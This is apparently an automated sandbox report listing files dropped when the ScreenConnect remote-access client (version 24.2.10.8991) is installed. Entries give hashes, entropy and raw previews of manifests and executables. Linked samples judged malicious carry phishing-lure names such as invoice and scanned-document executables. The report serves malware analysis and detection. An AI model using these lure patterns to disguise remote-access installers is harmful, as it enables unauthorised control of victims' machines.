Preview:	.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	3452
Entropy (8bit):	4.346702782987417
Encrypted:	false
SSDEEP:	96:GJ3uWWbPPPieV+WwQXlmL4MckVM8Aw+0QhIYX:U3yJUUMckmb90Yf
MD5:	F69AFE124DA37EEAB3780922E920DFB2
SHA1:	481AA2F7226953E22561279772792732300BDD33
SHA-256:	912E15A9B0F1C8DD46A054F4E884ABC2AB3C86A18957A49EF732DCD3FCE40BF1
SHA-512:	708A5F0D4255F7C48400C6D572D4EA44E3EFAE9ADB5107AB95CD544035D5456A8CA581EFC0A60FCDCE762994F22475A50BB228D05896FD164099675BB555E643
Malicious:	false
Preview:	PcmH........W.Ks~...#...(.......T..........................."........<.g..J.\|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...................................................................................................................................................................................................nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.1303806593325705
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
MD5:	2343364BAC7A96205EB525ADDC4BBFD1
SHA1:	9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
SHA-256:	E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
SHA-512:	AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	5260
Entropy (8bit):	4.267552681604921
Encrypted:	false
SSDEEP:	96:DNq6R84OPPPPPPPceV+Ww7mk9O43jYHlIgBXSM5hvmwnjIbm:HR840JC9tUHlXBXrjd
MD5:	5340E9EA485F3531C439D64A0E5D4221
SHA1:	83B3B34BAD2EB480AF62942121380D87F3E5F0C3
SHA-256:	CEE8D74B8EACC58ABAB1B13AAA9DD53154671E174D867E05D317427D0BDB8825
SHA-512:	0F70C67DC1490DC4C7145AA5BA90B8F404D5B018918E5093ABB0BC3AEEFC14F84A10DD51E1C259777DF3C022BE6AB410898DCB753A4F5CA75646E6EFE712D517
Malicious:	false
Preview:	PcmH...........S..+4...t.......T...............P...........3........<.g..J.\|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........3..L.G.....[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u"...F.....Ey%.....E..X.(...s".I...R)....+.`...m,......;../............... ...#...&......-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........l...@.......................................(........... .......(...(...<.......d.......l.......\|...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(...............d...........p.......................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1982
Entropy (8bit):	5.057585371364542
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
MD5:	50FC8E2B16CC5920B0536C1F5DD4AEAE
SHA1:	6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
SHA-256:	95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
SHA-512:	BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	6588
Entropy (8bit):	4.131993111359332
Encrypted:	false
SSDEEP:	96:fMmxEPPPPPPPPPPUeV+WwwU8WpZ2LRheuMl2UfdVaMsnksJqi/D5:Lx2JwpZ2LRhyl5dVzVw75
MD5:	7232633A153F6A32548954017EC8440D
SHA1:	66C2383FB7B91372F5F0E723B0804B84522D462A
SHA-256:	7EE58233DC7E3C59B9D593B41A5B11FC644A6A3903B5784635770D5D68DF4DB8
SHA-512:	25B8F4B832B5B7C8DEE6B370854259709D304807740E8075933CE24134B0A440BC96D628A006C30AF18E95F27F78CA09747BD0897A87C97443869B80F457A188
Malicious:	false
Preview:	PcmH........8.u.8&.O@...........T...............t...........?........<.g..J.\|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.........}'.d................z..w.....[~31.X....y..&..d......B(.........C....."...^.ie...u%...[s.T..<(...s".I...R)...F.....Ey,.....E..X./...f..VC..2...O.&r..Vz5......;..8.....V....X;........... ...#...&...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...X...........@........................... .......0...(...8.......`.......h.......x...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(.......................(...$.......L.......T...(...l...................(.......................(...................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2573
Entropy (8bit):	5.026361555169168
Encrypted:	false
SSDEEP:	48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
MD5:	3133DE245D1C278C1C423A5E92AF63B6
SHA1:	D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
SHA-256:	61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
SHA-512:	B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	3032
Entropy (8bit):	4.237477492912773
Encrypted:	false
SSDEEP:	48:RMQScQPPsgIe6S+9oww7g47JO2V42WAX0nwbb:RXScQPPweV+WwwnJOr2WAX0nEb
MD5:	BFFB5EB1D914FDE56DF62B0382037B6F
SHA1:	E6031C1237C21831D1AC64D8CC6AC8BD9FD95C62
SHA-256:	FA90335E72A05CE7F1E96C9210F12D268A4EEA2C7F90AF6DC8A3D3444AFC2B7F
SHA-512:	9327CE15E0133AB0B9A62399B362D148D6C06F7E2E8E4503DD357181A96718CFE074CA41357C3F068FB15C87BCC6669FF18E660570DD9F05864B93C2FAC24BC7
Malicious:	false
Preview:	PcmH.........C&..m..............T....................................<.g..J.\|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...............................................................................................................................................................nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............<...........MdSp ...$....... ..."............... urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1041
Entropy (8bit):	5.147328807370198
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
MD5:	2EA1AC1E39B8029AA1D1CEBB1079C706
SHA1:	5788C00093D358F8B3D8A98B0BEF5D0703031E3F
SHA-256:	8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
SHA-512:	6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	14612
Entropy (8bit):	5.714794935687755
Encrypted:	false
SSDEEP:	192:SWh4+tn9q5s6VHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoDOs:SWh9qS6VTX9dX9R/QPIBM7YDb
MD5:	2CD62D51E84F334D6D00F20C122BB5FD
SHA1:	07C854C2C4EC5485AA63BECCEC6F7EFC8D98451B
SHA-256:	886E104CFDCB7A90FDE467E277D2F4F48F71326C881F962F58A3F84A8944C3F3
SHA-512:	07D6079F95AE6D8C00012DF313748F7EAA2E7C412CAD0BDCE149A8235DEF9FCA8610AA193ED765B1F64815FB72E0A6E68E18DC04DECEB138ECEB1D62D3E9E246
Malicious:	false
Preview:	PcmH.........M..}...$...@.......T...............8...........#........<.g..J.\|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........3..L.G..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......@8......H8......P8......p8......t8..L...\|8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%....]...Tk....Y?.Om../.............-........................E......................................4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.10.8991........................

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
Category:	dropped
Size (bytes):	147976
Entropy (8bit):	5.699150757460175
Encrypted:	false
SSDEEP:	3072:0aNYcT51/FXvMVNWfCXq9ymdrpErpErpXm2o9HuzhJOvP:0dcfiVITrpErpErpXmt8vOvP
MD5:	B7DEB98212080D0214AD779A9446FF09
SHA1:	05FAD5E8F0131FB5DD9D6EFA8F879E8FA684B569
SHA-256:	C8DC03F64AA8D794D5A763B4260C18967267B7E9C55E1BE8D0ECCF5107C9D49A
SHA-512:	7F93A5DF3A29312518CE188DBD72B987FD5B99DB58C4E8ACC7FF9677907B1B74F2126A6D4FD1DEF4FE136649D5690EB3EBFE739D57299C0A6E4E5EA7DB1C74E2
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	4428
Entropy (8bit):	4.349169727645791
Encrypted:	false
SSDEEP:	96:ovXgPPPPP1eV+Ww8U45umW/I0X2tACDMzNNTlkoNOrf:kPJjumibBuoq
MD5:	CF8268CC8B791E6F03A75AAD742AFE40
SHA1:	C3F5B7CE8C75F1716AA3B0B716291B5411ED1537
SHA-256:	DDBA0F69FB4282ABC537F68EF57E45F2B1A63ED648288B7A281131111B567FA9
SHA-512:	F88094F07B416DA61DFB306EAC5891502BD86A43FAA53BBE131FC8F46DC95DC49BDCBE27A258E94F9E2DB530200B7324211D9D60E7C32DF5234A5D1F93D5A513
Malicious:	false
Preview:	PcmH.........%....,...T.......T...............8...........+........<.g..J.\|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........3..L.G........6...................z..w.....[~31.X....y..&..d......B(.........[s.T..<....s".I...R......E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......\|...........(...............................(................... ...(...4.......\.......d...(...\|...................(...............L...........0...................................................................................................................................................................................................................................................................................................nameScreenConnect.Cl

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	5.084538887646832
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
MD5:	E11E5D85F8857144751D60CED3FAE6D7
SHA1:	7E0AE834C6B1DEA46B51C3101852AFEEA975D572
SHA-256:	ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
SHA-512:	5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95520
Entropy (8bit):	6.505346220942731
Encrypted:	false
SSDEEP:	1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
MD5:	361BCC2CB78C75DD6F583AF81834E447
SHA1:	1E2255EC312C519220A4700A079F02799CCD21D6
SHA-256:	512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
SHA-512:	94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious, Browse Filename: E_BILL9926378035.exe, Detection: malicious, Browse Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious, Browse Filename: E_BILL0041272508.exe, Detection: malicious, Browse Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious, Browse Filename: E_BILL9926378035.exe, Detection: malicious, Browse Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61216
Entropy (8bit):	6.31175789874945
Encrypted:	false
SSDEEP:	1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
MD5:	6DF2DEF5E591E2481E42924B327A9F15
SHA1:	38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
SHA-256:	B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
SHA-512:	5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious, Browse Filename: E_BILL9926378035.exe, Detection: malicious, Browse Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious, Browse Filename: E_BILL0041272508.exe, Detection: malicious, Browse Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious, Browse Filename: E_BILL9926378035.exe, Detection: malicious, Browse Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!......0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsClient.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
